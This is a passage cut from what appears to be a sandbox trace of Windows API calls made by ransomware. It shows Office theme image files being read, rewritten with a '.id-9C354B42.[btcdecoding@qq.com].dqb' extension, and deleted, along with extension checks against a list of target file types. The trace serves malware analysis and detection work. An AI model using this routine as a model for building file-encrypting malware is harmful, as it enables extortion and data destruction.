lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.398] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.398] SetEndOfFile (hFile=0x200) returned 1 [0044.398] CloseHandle (hObject=0x200) returned 1 [0044.398] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.398] SetEndOfFile (hFile=0x174) returned 1 [0044.399] CloseHandle (hObject=0x174) returned 1 [0044.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.399] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 1 [0044.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.399] lstrlenW (lpString=".doc") returned 4 [0044.399] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.399] lstrlenW (lpString=".docx") returned 5 [0044.399] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.399] lstrlenW (lpString=".pdf") returned 4 [0044.399] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.399] lstrlenW (lpString=".xls") returned 4 [0044.399] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.399] lstrlenW (lpString=".xlsx") returned 5 [0044.399] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.399] lstrlenW (lpString=".ppt") returned 4 [0044.399] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.399] lstrlenW (lpString=".zip") returned 4 [0044.399] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString=".rar") returned 4 [0044.400] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString=".bz2") returned 4 [0044.400] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.400] lstrlenW (lpString=".7z") returned 3 [0044.400] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.400] lstrlenW (lpString=".dbf") returned 4 [0044.400] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.400] lstrlenW (lpString=".1cd") returned 4 [0044.400] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.400] lstrlenW (lpString=".jpg") returned 4 [0044.400] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.400] lstrlenW (lpString=".doc") returned 4 [0044.400] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.400] lstrlenW (lpString=".docx") returned 5 [0044.400] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.400] lstrlenW (lpString=".pdf") returned 4 [0044.400] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString=".xls") returned 4 [0044.400] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString=".xlsx") returned 5 [0044.400] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.400] lstrlenW (lpString=".ppt") returned 4 [0044.400] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.400] lstrlenW (lpString=".zip") returned 4 [0044.400] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString=".rar") returned 4 [0044.400] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.400] lstrlenW (lpString=".bz2") returned 4 [0044.400] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.401] lstrlenW (lpString=".7z") returned 3 [0044.401] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.401] lstrlenW (lpString=".dbf") returned 4 [0044.401] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.401] lstrlenW (lpString=".1cd") returned 4 [0044.401] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0044.401] lstrlenW (lpString=".jpg") returned 4 [0044.401] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.401] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.401] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.732] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=21745) returned 1 [0044.732] CloseHandle (hObject=0x204) returned 1 [0044.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 0x20 [0044.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.732] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.732] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0044.733] GetLastError () returned 0x0 [0044.733] ReadFile (in: hFile=0x204, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x54f1, lpOverlapped=0x0) returned 1 [0044.735] WriteFile (in: hFile=0x220, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x5500, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x5500, lpOverlapped=0x0) returned 1 [0044.736] ReadFile (in: hFile=0x204, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.736] WriteFile (in: hFile=0x220, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.736] SetEndOfFile (hFile=0x220) returned 1 [0044.736] CloseHandle (hObject=0x220) returned 1 [0044.736] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.736] SetEndOfFile (hFile=0x204) returned 1 [0044.737] CloseHandle (hObject=0x204) returned 1 [0044.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.737] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 1 [0044.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.738] lstrlenW (lpString=".doc") returned 4 [0044.738] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.738] lstrlenW (lpString=".docx") returned 5 [0044.738] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.738] lstrlenW (lpString=".pdf") returned 4 [0044.738] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.738] lstrlenW (lpString=".xls") returned 4 [0044.738] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.738] lstrlenW (lpString=".xlsx") returned 5 [0044.738] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.738] lstrlenW (lpString=".ppt") returned 4 [0044.738] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.738] lstrlenW (lpString=".zip") returned 4 [0044.738] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.738] lstrlenW (lpString=".rar") returned 4 [0044.738] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.738] lstrlenW (lpString=".bz2") returned 4 [0044.738] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.738] lstrlenW (lpString=".7z") returned 3 [0044.738] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.738] lstrlenW (lpString=".dbf") returned 4 [0044.738] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.738] lstrlenW (lpString=".1cd") returned 4 [0044.738] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.738] lstrlenW (lpString=".jpg") returned 4 [0044.738] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.739] lstrlenW (lpString=".doc") returned 4 [0044.739] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.739] lstrlenW (lpString=".docx") returned 5 [0044.739] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.739] lstrlenW (lpString=".pdf") returned 4 [0044.739] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.739] lstrlenW (lpString=".xls") returned 4 [0044.739] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.739] lstrlenW (lpString=".xlsx") returned 5 [0044.739] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.739] lstrlenW (lpString=".ppt") returned 4 [0044.739] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.739] lstrlenW (lpString=".zip") returned 4 [0044.739] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.739] lstrlenW (lpString=".rar") returned 4 [0044.739] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.739] lstrlenW (lpString=".bz2") returned 4 [0044.739] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.739] lstrlenW (lpString=".7z") returned 3 [0044.739] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.739] lstrlenW (lpString=".dbf") returned 4 [0044.739] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.739] lstrlenW (lpString=".1cd") returned 4 [0044.739] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0044.739] lstrlenW (lpString=".jpg") returned 4 [0044.739] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.740] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.740] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.113] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=34163) returned 1 [0045.113] CloseHandle (hObject=0x200) returned 1 [0045.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 0x20 [0045.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.114] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.114] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.114] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.114] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.114] GetLastError () returned 0x0 [0045.114] ReadFile (in: hFile=0x200, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x8573, lpOverlapped=0x0) returned 1 [0045.234] WriteFile (in: hFile=0x214, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x8580, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x8580, lpOverlapped=0x0) returned 1 [0045.235] ReadFile (in: hFile=0x200, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.235] WriteFile (in: hFile=0x214, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.235] SetEndOfFile (hFile=0x214) returned 1 [0045.235] CloseHandle (hObject=0x214) returned 1 [0045.235] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.236] SetEndOfFile (hFile=0x200) returned 1 [0045.236] CloseHandle (hObject=0x200) returned 1 [0045.236] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.237] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 1 [0045.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.237] lstrlenW (lpString=".doc") returned 4 [0045.237] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.237] lstrlenW (lpString=".docx") returned 5 [0045.237] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.237] lstrlenW (lpString=".pdf") returned 4 [0045.238] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.238] lstrlenW (lpString=".xls") returned 4 [0045.238] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.238] lstrlenW (lpString=".xlsx") returned 5 [0045.238] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.238] lstrlenW (lpString=".ppt") returned 4 [0045.238] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.238] lstrlenW (lpString=".zip") returned 4 [0045.238] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.238] lstrlenW (lpString=".rar") returned 4 [0045.238] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.238] lstrlenW (lpString=".bz2") returned 4 [0045.238] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.238] lstrlenW (lpString=".7z") returned 3 [0045.238] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.238] lstrlenW (lpString=".dbf") returned 4 [0045.238] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.238] lstrlenW (lpString=".1cd") returned 4 [0045.238] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.238] lstrlenW (lpString=".jpg") returned 4 [0045.238] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.238] lstrlenW (lpString=".doc") returned 4 [0045.238] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.238] lstrlenW (lpString=".docx") returned 5 [0045.238] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.238] lstrlenW (lpString=".pdf") returned 4 [0045.238] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.238] lstrlenW (lpString=".xls") returned 4 [0045.238] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.238] lstrlenW (lpString=".xlsx") returned 5 [0045.239] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.239] lstrlenW (lpString=".ppt") returned 4 [0045.239] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.239] lstrlenW (lpString=".zip") returned 4 [0045.239] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.239] lstrlenW (lpString=".rar") returned 4 [0045.239] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.239] lstrlenW (lpString=".bz2") returned 4 [0045.239] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.239] lstrlenW (lpString=".7z") returned 3 [0045.239] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.239] lstrlenW (lpString=".dbf") returned 4 [0045.239] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.239] lstrlenW (lpString=".1cd") returned 4 [0045.239] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0045.239] lstrlenW (lpString=".jpg") returned 4 [0045.239] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.239] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0045.239] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.239] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.384] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1009) returned 1 [0045.384] CloseHandle (hObject=0x228) returned 1 [0045.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 0x20 [0045.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.384] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0045.384] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.384] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.384] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0045.560] GetLastError () returned 0x0 [0045.560] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x3f1, lpOverlapped=0x0) returned 1 [0045.600] WriteFile (in: hFile=0x224, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x400, lpOverlapped=0x0) returned 1 [0045.623] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, 